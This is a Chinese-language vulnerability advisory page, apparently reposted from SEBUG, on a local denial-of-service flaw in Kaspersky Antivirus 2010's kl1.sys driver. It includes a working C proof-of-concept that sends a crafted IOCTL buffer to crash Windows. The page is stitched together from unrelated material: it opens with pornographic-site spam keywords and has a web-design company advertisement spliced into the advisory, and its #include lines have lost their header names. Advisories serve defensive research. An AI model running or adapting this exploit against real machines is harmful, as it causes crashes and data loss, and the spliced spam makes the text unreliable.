日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

影響版本: Kaspersky Labs Kaspersky Antivirus 2010 9.0.0.463

公司主營業(yè)務：做網站、成都網站建設、移動網站開發(fā)等業(yè)務。幫助企業(yè)客戶真正實現(xiàn)互聯(lián)網宣傳，提高企業(yè)的競爭能力。創(chuàng)新互聯(lián)是一支青春激揚、勤奮敬業(yè)、活力青春激揚、勤奮敬業(yè)、活力澎湃、和諧高效的團隊。公司秉承以“開放、自由、嚴謹、自律”為核心的企業(yè)文化，感謝他們對我們的高要求，感謝他們從不同領域給我們帶來的挑戰(zhàn)，讓我們激情的團隊有機會用頭腦與智慧不斷的給客戶帶來驚喜。創(chuàng)新互聯(lián)推出阜新免費做網站回饋大家。

漏洞描述: BUGTRAQ  ID: 37044

Kaspersky Antivirus是非常流行的殺毒軟件。

Kaspersky殺毒軟件所使用的kl1.sys驅動沒有檢查IOCTL的輸入地址，如果用戶修改了一個或兩個DWORD就可以觸發(fā)異常，導致系統(tǒng)藍屏死機。

<*參考  Heurs （heurs@ghostsinthstack.org） *>
測試方法:

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!

#include

#include

#include

#include

#include

int __cdecl main(int argc, char* argv[]) 
{ 
    HANDLE hDevice = (HANDLE) 0xffffffff; 
    DWORD NombreByte; 
    DWORD Crashing[] = { 
         0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a, 
         0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961, 
         0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9, 
         0xb5ebadc5 
        }; 
    BYTE Out[0x20]; 
     
    printf("Local DoS - Kaspersky 2010 9.0.0.463\n\n"); 
    hDevice = CreateFile("\\\\.\\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL); 
     
    DeviceIoControl(hDevice,0x0022c008,Crashing,sizeof(Crashing),Out,sizeof(Out),&NombreByte,NULL); 
     
    printf("Sploit Send.\nhDevice = %x\n", hDevice); 
    CloseHandle(hDevice); 
    getch(); 
    return 0; 
} 

SEBUG安全建議:

廠商補?。?/p>

Kaspersky Labs

目前廠商還沒有提供補丁或者升級程序，我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本：

http://www.kaspersky.com/

【編輯推薦】

1. Cisco IOS MSFC2 畸形二層幀遠程拒絕服務安全缺陷
2. Sun OpenSolaris內核Panic遠程拒絕服務漏洞
3. 谷歌發(fā)布Android安全漏洞補丁修復兩個DoS漏洞